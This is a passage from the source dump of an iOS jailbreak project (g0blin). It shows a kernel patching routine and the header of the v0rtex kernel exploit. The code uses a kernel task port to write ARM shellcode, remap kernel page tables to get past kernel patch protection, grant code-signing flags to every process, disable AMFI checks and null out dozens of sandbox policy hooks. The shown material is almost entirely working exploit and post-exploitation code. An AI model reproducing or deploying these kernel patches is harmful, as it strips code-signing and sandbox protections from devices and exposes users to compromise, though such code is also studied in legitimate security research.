29 | tfp0 = tfpzero; 30 | 31 | uint64_t kbase = slide + OFFSET_BASE; 32 | LOG("[INFO]: kernel base = 0x%llx", kbase); 33 | 34 | int rv = init_patchfinder(tfp0, kbase, NULL); 35 | if (rv != 0) { 36 | printf("[ERROR]: could not initialize kernel \n"); 37 | ret = KERN_FAILURE; 38 | goto cleanup; 39 | } 40 | printf("[INFO]: sucessfully initialized patchfinder \n"); 41 | 42 | 43 | #pragma mark - csflags 44 | 45 | uint64_t allproc = find_allproc(); 46 | LOG("[INFO]: allproc = 0x%llx", allproc); 47 | 48 | uint64_t proc = ReadAnywhere64(allproc); 49 | while(proc) { 50 | uint32_t pid = ReadAnywhere32(proc + offset_p_pid); 51 | char pname[40] = {0}; 52 | kread(proc + offset_p_comm, pname, 20); 53 | 54 | //TEST 55 | //if (strstr(pname, "containermanager")) { 56 | // printf("[INFO]: found containermanagerd, giving it kern creds \n"); 57 | // WriteAnywhere64(proc + offset_p_cred, kern_cred); 58 | //} 59 | 60 | if (pid > 0) { 61 | uint32_t csflags = ReadAnywhere32(proc + offset_p_csflags); 62 | csflags |= CS_PLATFORM_BINARY|CS_INSTALLER|CS_GET_TASK_ALLOW|CS_VALID; 63 | csflags &= ~(CS_RESTRICT|CS_KILL|CS_HARD); 64 | WriteAnywhere32(proc + offset_p_csflags, csflags); 65 | printf("[INFO]: entitled proc: (%d) %s \n", pid, pname); 66 | } 67 | 68 | proc = ReadAnywhere64(proc); 69 | } 70 | 71 | 72 | #pragma mark - bypass 73 | 74 | checkvad(); 75 | 76 | uint64_t gStoreBase = find_gPhysBase(); 77 | printf("[INFO]: gStoreBase = %llx \n", gStoreBase); 78 | 79 | gPhysBase = ReadAnywhere64(gStoreBase); 80 | printf("[INFO]: gPhysBase = %llx \n", gPhysBase); 81 | 82 | gVirtBase = ReadAnywhere64(gStoreBase+8); 83 | printf("[INFO]: gVirtBase = %llx \n", gVirtBase); 84 | 85 | uint64_t entryp = find_entry() + slide; 86 | printf("[INFO]: entryp = %llx \n", entryp); 87 | 88 | uint64_t rvbar = entryp & (~0xFFF); 89 | printf("[INFO]: rvbar = %llx \n", rvbar); 90 | 91 | uint64_t cpul = find_register_value(rvbar+0x40, 1); 92 | printf("[INFO]: cpul = %llx \n", cpul); 93 | 94 | uint64_t optr = find_register_value(rvbar+0x50, 20); 95 | printf("[INFO]: optr = %llx \n", optr); 96 | 97 | uint64_t cpu_list = ReadAnywhere64(cpul - 0x10 /*the add 0x10, 0x10 instruction confuses findregval*/) - gPhysBase + gVirtBase; 98 | printf("[INFO]: cpu_list = %llx \n", cpu_list); 99 | 100 | uint64_t cpu = ReadAnywhere64(cpu_list); 101 | printf("[INFO]: cpu = %llx \n", cpu); 102 | 103 | uint64_t pmap_store = find_kernel_pmap(); 104 | printf("[INFO]: pmap = %llx \n", pmap_store); 105 | 106 | level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store)); 107 | printf("[INFO]: level1_table = %llx \n", level1_table); 108 | 109 | 110 | uint64_t shellcode = physalloc(0x4000); 111 | 112 | /* 113 | ldr x30, a 114 | ldr x0, b 115 | br x0 116 | nop 117 | a: 118 | .quad 0 119 | b: 120 | .quad 0 121 | none of that squad shit tho, straight gang shit. free rondonumbanine 122 | */ 123 | 124 | WriteAnywhere32(shellcode + 0x100, 0x5800009e); /* trampoline for idlesleep */ 125 | WriteAnywhere32(shellcode + 0x100 + 4, 0x580000a0); 126 | WriteAnywhere32(shellcode + 0x100 + 8, 0xd61f0000); 127 | 128 | WriteAnywhere32(shellcode + 0x200, 0x5800009e); /* trampoline for deepsleep */ 129 | WriteAnywhere32(shellcode + 0x200 + 4, 0x580000a0); 130 | WriteAnywhere32(shellcode + 0x200 + 8, 0xd61f0000); 131 | 132 | char buf[0x100]; 133 | copyin(buf, optr, 0x100); 134 | copyout(shellcode+0x300, buf, 0x100); 135 | 136 | uint64_t physcode = findphys_real(shellcode); 137 | printf("[INFO]: got phys at %llx for virt %llx \n", physcode, shellcode); 138 | 139 | uint64_t idlesleep_handler = 0; 140 | 141 | uint64_t plist[12]={0,0,0,0,0,0,0,0,0,0,0,0}; 142 | int z = 0; 143 | 144 | int idx = 0; 145 | int ridx = 0; 146 | while (cpu) { 147 | cpu = cpu - gPhysBase + gVirtBase; 148 | if ((ReadAnywhere64(cpu+0x130) & 0x3FFF) == 0x100) { 149 | printf("[ERROR]: already jailbroken, bailing out \n"); 150 | ret = KERN_ABORTED; 151 | goto cleanup; 152 | } 153 | 154 | if (!idlesleep_handler) { 155 | WriteAnywhere64(shellcode + 0x100 + 0x18, ReadAnywhere64(cpu+0x130)); // idlehandler 156 | printf("[INFO]: idlehandler: %llx \n", ReadAnywhere64(cpu+0x130)); 157 | WriteAnywhere64(shellcode + 0x200 + 0x18, ReadAnywhere64(cpu+0x130) + 12); // deephandler 158 | printf("[INFO]: deephandler: %llx \n", ReadAnywhere64(cpu+0x130) + 12); 159 | 160 | idlesleep_handler = ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase; 161 | printf("[INFO]: idlesleep_handler = %llx \n", idlesleep_handler); 162 | 163 | uint32_t* opcz = malloc(0x1000); 164 | copyin(opcz, idlesleep_handler, 0x1000); 165 | idx = 0; 166 | while (1) { 167 | if (opcz[idx] == 0xd61f0000 /* br x0 */) { 168 | break; 169 | } 170 | idx++; 171 | } 172 | ridx = idx; 173 | while (1) { 174 | if (opcz[ridx] == 0xd65f03c0 /* ret */) { 175 | break; 176 | } 177 | ridx++; 178 | } 179 | } 180 | printf("[INFO]: found cpu %x\n", ReadAnywhere32(cpu+0x330)); 181 | printf("[INFO]: found physz: %llx\n", ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase); 182 | 183 | plist[z++] = cpu+0x130; 184 | cpu_list += 0x10; 185 | cpu = ReadAnywhere64(cpu_list); 186 | } 187 | 188 | uint64_t shc = physalloc(0x4000); 189 | 190 | uint64_t regi = find_register_value(idlesleep_handler+12, 30); 191 | uint64_t regd = find_register_value(idlesleep_handler+24, 30); 192 | printf("[INFO]: regi=%llx - regd=%llx\n", regi, regd); 193 | 194 | for (int i = 0; i < 0x500/4; i++) { 195 | WriteAnywhere32(shc+i*4, INSN_NOP); 196 | } 197 | 198 | /* 199 | isvad 0 == 0x4000 200 | */ 201 | 202 | uint64_t level0_pte = physalloc(isvad == 0 ? 0x4000 : 0x1000); 203 | 204 | uint64_t ttbr0_real = find_register_value(idlesleep_handler + idx*4 + 24, 1); 205 | printf("[INFO]: ttbr0: %llx %llx\n",ReadAnywhere64(ttbr0_real), ttbr0_real); 206 | 207 | char* bbuf = malloc(0x4000); 208 | copyin(bbuf, ReadAnywhere64(ttbr0_real) - gPhysBase + gVirtBase, isvad == 0 ? 0x4000 : 0x1000); 209 | copyout(level0_pte, bbuf, isvad == 0 ? 0x4000 : 0x1000); 210 | 211 | uint64_t physp = findphys_real(level0_pte); 212 | printf("[INFO]: physp: %llx \n", physp); 213 | 214 | WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 215 | WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 216 | WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1 217 | WriteAnywhere32(shc+12, 0xd5033fdf); // isb 218 | WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy 219 | WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish 220 | WriteAnywhere32(shc+24, 0xd5033fdf); // isb 221 | WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8 222 | WriteAnywhere32(shc+32, 0xd65f03c0); // ret 223 | WriteAnywhere64(shc+40, regi); 224 | WriteAnywhere64(shc+48, /* new ttbr1 */ physp); 225 | 226 | shc+=0x100; 227 | WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 228 | WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 229 | WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1 230 | WriteAnywhere32(shc+12, 0xd5033fdf); // isb 231 | WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy 232 | WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish 233 | WriteAnywhere32(shc+24, 0xd5033fdf); // isb 234 | WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8 235 | WriteAnywhere32(shc+32, 0xd65f03c0); // ret 236 | WriteAnywhere64(shc+40, regd); /*handle deepsleep*/ 237 | WriteAnywhere64(shc+48, /* new ttbr1 */ physp); 238 | shc-=0x100; 239 | 240 | // amfiret shellcode 241 | int n = 0; 242 | 243 | // WriteAnywhere32(shc+0x200+n, 0x18000148); n+=4; // ldr w8, 0x28 244 | // WriteAnywhere32(shc+0x200+n, 0xb90002e8); n+=4; // str w8, [x23] 245 | // WriteAnywhere32(shc+0x200+n, 0xaa1f03e0); n+=4; // mov x0, xzr 246 | // 247 | // WriteAnywhere32(shc+0x200+n, 0xd10103bf); n+=4; // sub sp, x29, #64 248 | // WriteAnywhere32(shc+0x200+n, 0xa9447bfd); n+=4; // ldp x29, x30, [sp, #64] 249 | // WriteAnywhere32(shc+0x200+n, 0xa9434ff4); n+=4; // ldp x20, x19, [sp, #48] 250 | // WriteAnywhere32(shc+0x200+n, 0xa94257f6); n+=4; // ldp x22, x21, [sp, #32] 251 | // WriteAnywhere32(shc+0x200+n, 0xa9415ff8); n+=4; // ldp x24, x23, [sp, #16] 252 | // WriteAnywhere32(shc+0x200+n, 0xa8c567fa); n+=4; // ldp x26, x25, [sp], #80 (0x50) 253 | // WriteAnywhere32(shc+0x200+n, 0xd65f03c0); n+=4; // ret 254 | // WriteAnywhere32(shc+0x200+n, 0x0e00400f); n+=4; // tbl.8b v15, { v0, v1, v2 }, v0 255 | 256 | // 10.3 257 | WriteAnywhere32(shc+0x200+n, 0x18000148); n+=4; // ldr w8, 0x28 258 | WriteAnywhere32(shc+0x200+n, 0xb90002e8); n+=4; // str w8, [x23] 259 | WriteAnywhere32(shc+0x200+n, 0xaa1f03e0); n+=4; // mov x0, xzr 260 | 261 | WriteAnywhere32(shc+0x200+n, 0xA9477BFD); n+=4; // ldp x29, x30, [sp, #112] 262 | WriteAnywhere32(shc+0x200+n, 0xA9464FF4); n+=4; // ldp x20, x19, [sp, #96] 263 | WriteAnywhere32(shc+0x200+n, 0xA94557F6); n+=4; // ldp x22, x21, [sp, #80] 264 | WriteAnywhere32(shc+0x200+n, 0xA9445FF8); n+=4; // ldp x24, x23, [sp, #64] 265 | WriteAnywhere32(shc+0x200+n, 0xA94367FA); n+=4; // ldp x26, x25, [sp, #48] 266 | WriteAnywhere32(shc+0x200+n, 0x910203FF); n+=4; // add sp, sp, #128 267 | WriteAnywhere32(shc+0x200+n, 0xd65f03c0); n+=4; // ret 268 | WriteAnywhere32(shc+0x200+n, 0x0e00400f); n+=4; // tbl.8b v15, { v0, v1, v2 }, v0 269 | 270 | 271 | mach_vm_protect(tfp0, shc, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); 272 | printf("[INFO]: shc: %llx \n", shc); 273 | 274 | mach_vm_address_t kppsh = 0; 275 | mach_vm_allocate(tfp0, &kppsh, 0x4000, VM_FLAGS_ANYWHERE); 276 | { 277 | int n = 0; 278 | 279 | WriteAnywhere32(kppsh+n, 0x580001e1); n+=4; // ldr x1, #60 280 | WriteAnywhere32(kppsh+n, 0x58000140); n+=4; // ldr x0, #40 281 | WriteAnywhere32(kppsh+n, 0xd5182020); n+=4; // msr TTBR1_EL1, x0 282 | WriteAnywhere32(kppsh+n, 0xd2a00600); n+=4; // movz x0, #0x30, lsl #16 283 | WriteAnywhere32(kppsh+n, 0xd5181040); n+=4; // msr CPACR_EL1, x0 284 | WriteAnywhere32(kppsh+n, 0xd5182021); n+=4; // msr TTBR1_EL1, x1 285 | WriteAnywhere32(kppsh+n, 0x10ffffe0); n+=4; // adr x0, #-4 286 | WriteAnywhere32(kppsh+n, isvad ? 0xd5033b9f : INSN_NOP); n+=4; // dsb ish (4k) / nop (16k) 287 | WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vmalle1 (4k) / tlbi vae1, x30 (16k) 288 | WriteAnywhere32(kppsh+n, 0xd5033fdf); n+=4; // isb 289 | WriteAnywhere32(kppsh+n, 0xd65f03c0); n+=4; // ret 290 | WriteAnywhere64(kppsh+n, ReadAnywhere64(ttbr0_real)); n+=8; 291 | WriteAnywhere64(kppsh+n, physp); n+=8; 292 | WriteAnywhere64(kppsh+n, physp); n+=8; 293 | } 294 | 295 | mach_vm_protect(tfp0, kppsh, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); 296 | printf("[INFO]: kppsh: %llx \n", kppsh); 297 | 298 | WriteAnywhere64(shellcode + 0x100 + 0x10, shc - gVirtBase + gPhysBase); // idle 299 | WriteAnywhere64(shellcode + 0x200 + 0x10, shc + 0x100 - gVirtBase + gPhysBase); // idle 300 | 301 | WriteAnywhere64(shellcode + 0x100 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // idlehandler 302 | WriteAnywhere64(shellcode + 0x200 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // deephandler 303 | 304 | /* 305 | 306 | pagetables are now not real anymore, they're real af 307 | 308 | */ 309 | 310 | uint64_t cpacr_addr = find_cpacr_write(); 311 | printf("[INFO]: cpacr_write at %llx\n", cpacr_addr); 312 | 313 | 314 | #define PSZ (isvad ? 0x1000 : 0x4000) 315 | #define PMK (PSZ-1) 316 | 317 | 318 | #define RemapPage_(address) \ 319 | pagestuff_64((address) & (~PMK), ^(vm_address_t tte_addr, int addr) {\ 320 | uint64_t tte = ReadAnywhere64(tte_addr);\ 321 | if (!(TTE_GET(tte, TTE_IS_TABLE_MASK))) {\ 322 | printf("[INFO]: breakup!\n");\ 323 | uint64_t fakep = physalloc(PSZ);\ 324 | uint64_t realp = TTE_GET(tte, TTE_PHYS_VALUE_MASK);\ 325 | TTE_SETB(tte, TTE_IS_TABLE_MASK);\ 326 | for (int i = 0; i < PSZ/8; i++) {\ 327 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, realp + i * PSZ);\ 328 | WriteAnywhere64(fakep+i*8, tte);\ 329 | }\ 330 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(fakep));\ 331 | WriteAnywhere64(tte_addr, tte);\ 332 | }\ 333 | uint64_t newt = physalloc(PSZ);\ 334 | copyin(bbuf, TTE_GET(tte, TTE_PHYS_VALUE_MASK) - gPhysBase + gVirtBase, PSZ);\ 335 | copyout(newt, bbuf, PSZ);\ 336 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(newt));\ 337 | TTE_SET(tte, TTE_BLOCK_ATTR_UXN_MASK, 0);\ 338 | TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\ 339 | WriteAnywhere64(tte_addr, tte);\ 340 | }, level1_table, isvad ? 1 : 2); 341 | 342 | 343 | #define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase) 344 | 345 | uint64_t* remappage = calloc(512, 8); 346 | 347 | int remapcnt = 0; 348 | 349 | 350 | #define RemapPage(x)\ 351 | {\ 352 | int fail = 0;\ 353 | for (int i = 0; i < remapcnt; i++) {\ 354 | if (remappage[i] == (x & (~PMK))) {\ 355 | fail = 1;\ 356 | }\ 357 | }\ 358 | if (fail == 0) {\ 359 | RemapPage_(x);\ 360 | RemapPage_(x+PSZ);\ 361 | remappage[remapcnt++] = (x & (~PMK));\ 362 | }\ 363 | } 364 | 365 | 366 | level1_table = physp - gPhysBase + gVirtBase; 367 | printf("[INFO]: level1_table = %llx \n", level1_table); 368 | WriteAnywhere64(ReadAnywhere64(pmap_store), level1_table); 369 | 370 | 371 | uint64_t shtramp = kbase + ((const struct mach_header *)find_mh())->sizeofcmds + sizeof(struct mach_header_64); 372 | printf("[INFO]: shtramp = %llx \n", shtramp); 373 | RemapPage(cpacr_addr); 374 | WriteAnywhere32(NewPointer(cpacr_addr), 0x94000000 | (((shtramp - cpacr_addr)/4) & 0x3FFFFFF)); 375 | 376 | 377 | RemapPage(shtramp); 378 | WriteAnywhere32(NewPointer(shtramp), 0x58000041); // ldr x1, #8 379 | WriteAnywhere32(NewPointer(shtramp)+4, 0xd61f0020); // br x1 380 | WriteAnywhere64(NewPointer(shtramp)+8, kppsh); 381 | printf("[INFO]: wrote branch to kppsh -> 0x%llx \n", kppsh); 382 | 383 | 384 | #pragma mark - LwVM 385 | 386 | uint64_t lwvm_write = find_lwvm_mapio_patch(); 387 | printf("[INFO]: lwvm_write = %llx \n", lwvm_write); 388 | uint64_t lwvm_value = find_lwvm_mapio_newj(); 389 | printf("[INFO]: lwvm_value = %llx \n", lwvm_value); 390 | RemapPage(lwvm_write); 391 | WriteAnywhere64(NewPointer(lwvm_write), lwvm_value); 392 | 393 | 394 | #pragma mark - MarijuanARM 395 | 396 | uint64_t kernvers = find_str("Darwin Kernel Version"); 397 | uint64_t release = find_str("RELEASE_ARM"); 398 | 399 | RemapPage(kernvers-4); 400 | WriteAnywhere32(NewPointer(kernvers-4), 1); 401 | 402 | RemapPage(release); 403 | if (NewPointer(release) == (NewPointer(release+11) - 11)) { 404 | // smoke trees 405 | copyout(NewPointer(release), "MarijuanARM", 11); 406 | } 407 | 408 | 409 | #pragma mark - patch: nonce enabler 410 | 411 | uint64_t sysbootnonce = find_sysbootnonce(); 412 | printf("[INFO]: found com.apple.System.boot-nonce at: 0%llx\n", sysbootnonce); 413 | printf("val = %d \n", ReadAnywhere32(sysbootnonce)); 414 | WriteAnywhere32(sysbootnonce, 1); 415 | printf("new val = %d \n", ReadAnywhere32(sysbootnonce)); 416 | 417 | 418 | #pragma mark - patch: AMFI memcmp 419 | 420 | uint64_t memcmp_got = find_amfi_memcmpstub(); 421 | printf("[INFO]: memcmp_got at %llx\n", memcmp_got); 422 | 423 | uint64_t ret1 = find_ret_0(); 424 | printf("[INFO]: ret at %llx\n", ret1); 425 | 426 | RemapPage(memcmp_got); 427 | WriteAnywhere64(NewPointer(memcmp_got), ret1); 428 | 429 | uint64_t fref = find_reference(idlesleep_handler+0xC, 1, SearchInCore); 430 | printf("[INFO]: fref at %llx\n", fref); 431 | 432 | uint64_t amfiops = find_amfiops(); 433 | printf("[INFO]: amfiops = %llx\n", amfiops); 434 | 435 | { 436 | /* 437 | amfi 438 | */ 439 | 440 | uint64_t sbops = amfiops; 441 | uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops); 442 | 443 | uint64_t nopag = sbops_end - sbops; 444 | 445 | for (int i = 0; i < nopag; i+= PSZ) 446 | RemapPage(((sbops + i) & (~PMK))); 447 | 448 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0); 449 | } 450 | 451 | /* first str */ 452 | while (1) { 453 | uint32_t opcode = ReadAnywhere32(fref); 454 | if ((opcode & 0xFFC00000) == 0xF9000000) { 455 | int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8; 456 | int32_t myreg = (opcode >> 5) & 0x1f; 457 | uint64_t rgz = find_register_value(fref, myreg)+outhere; 458 | printf("[INFO]: 1st str at %llx\n", rgz); 459 | 460 | WriteAnywhere64(rgz, physcode+0x200); 461 | break; 462 | } 463 | fref += 4; 464 | } 465 | 466 | fref += 4; 467 | 468 | /* second str */ 469 | while (1) { 470 | uint32_t opcode = ReadAnywhere32(fref); 471 | if ((opcode & 0xFFC00000) == 0xF9000000) { 472 | int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8; 473 | int32_t myreg = (opcode >> 5) & 0x1f; 474 | uint64_t rgz = find_register_value(fref, myreg)+outhere; 475 | printf("[INFO]: 2nd str at %llx\n", rgz); 476 | 477 | WriteAnywhere64(rgz, physcode+0x100); 478 | break; 479 | } 480 | fref += 4; 481 | } 482 | 483 | 484 | #pragma mark - patch: sandbox policies 485 | 486 | { 487 | uint64_t sbops = find_sbops(); 488 | printf("[INFO]: sbops at %llx\n", sbops); 489 | 490 | uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK; 491 | uint64_t nopag = (sbops_end - sbops)/(PSZ); 492 | for (int i = 0; i < nopag; i++) { 493 | RemapPage(((sbops + i*(PSZ)) & (~PMK))); 494 | } 495 | 496 | // from yalu 497 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0); 498 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0); 499 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_access)), 0); 500 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_chroot)), 0); 501 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_create)), 0); 502 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_deleteextattr)), 0); 503 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exchangedata)), 0); 504 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exec)), 0); 505 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattrlist)), 0); 506 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getextattr)), 0); 507 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_ioctl)), 0); 508 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_link)), 0); 509 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_listextattr)), 0); 510 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_open)), 0); 511 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_readlink)), 0); 512 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setattrlist)), 0); 513 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setextattr)), 0); 514 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setflags)), 0); 515 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setmode)), 0); 516 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setowner)), 0); 517 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes)), 0); 518 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_stat)), 0); 519 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_truncate)), 0); 520 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_unlink)), 0); 521 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_notify_create)), 0); 522 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_fsgetpath)), 0); 523 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattr)), 0); 524 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_mount_check_stat)), 0); 525 | 526 | // from h3lix 527 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_proc_check_fork)), 0); 528 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_iokit_check_get_property)), 0); 529 | } 530 | 531 | 532 | #pragma mark - patch: Sandbox: process-exec denied while updating label 533 | 534 | // thx tihmstar 535 | { 536 | uint64_t off = find_sandbox_label_update(); 537 | LOG("patching check_label_update at: 0x%llx", off); 538 | RemapPage(off); 539 | WriteAnywhere32(NewPointer(off), INSN_NOP); 540 | } 541 | 542 | 543 | #pragma mark - patch: AMFI: hook..execve() 544 | 545 | { 546 | uint64_t point = find_amfiret() - 0x18; 547 | printf("[INFO]: amfiret point = %llx \n", point); 548 | 549 | RemapPage((point & (~PMK))); 550 | uint64_t remap = NewPointer(point); 551 | 552 | assert(ReadAnywhere32(point) == ReadAnywhere32(remap)); 553 | 554 | WriteAnywhere32(remap, 0x58000041); // ldr x1, #8 555 | WriteAnywhere32(remap + 4, 0xd61f0020); // br x1 556 | WriteAnywhere64(remap + 8, shc + 0x200); /* amfi shellcode */ 557 | } 558 | 559 | 560 | #pragma mark - 561 | 562 | for (int i = 0; i < z; i++) { 563 | WriteAnywhere64(plist[i], physcode + 0x100); 564 | } 565 | 566 | while (ReadAnywhere32(kernvers-4) != 1) { 567 | sleep(1); 568 | } 569 | 570 | 571 | LOG("[INFO]: enabled patches\n"); 572 | 573 | ret = KERN_SUCCESS; 574 | 575 | 576 | cleanup: 577 | return ret; 578 | } 579 | 580 | -------------------------------------------------------------------------------- /g0blin/v0rtex.h: -------------------------------------------------------------------------------- 1 | // v0rtex 2 | // Bug by Ian Beer. 3 | // Exploit by Siguza. 4 | 5 | /* 6 | MIT License 7 | 8 | Copyright (c) 2017 Siguza 9 | 10 | Permission is hereby granted, free of charge, to any person obtaining a copy 11 | of this software and associated documentation files (the "Software"), to deal 12 | in the Software without restriction, including without limitation the rights 13 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 14 | copies of the Software, and to permit persons to whom the Software is 15 | furnished to do so, subject to the following conditions: 16 | 17 | The above copyright notice and this permission notice shall be included in all 18 | copies or substantial portions of the Software. 19 | 20 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 21 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 22 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 23 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 24 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 25 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 26 | SOFTWARE. 27 | */ 28 | 29 | #import "common.h" 30 | #include 31 | #include // uint*_t 32 | 33 | typedef kern_return_t (*v0rtex_cb_t)(task_t tfp0, kptr_t kbase, void *data); 34 | 35 | kern_return_t v0rtex(task_t *tfp0, uint64_t *kslide, uint64_t *kerncred, uint64_t *selfcred, uint64_t *selfproc); 36 | -------------------------------------------------------------------------------- /g0blin/y0nkers.m4v: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/y0nkers.m4v --------------------------------------------------------------------------------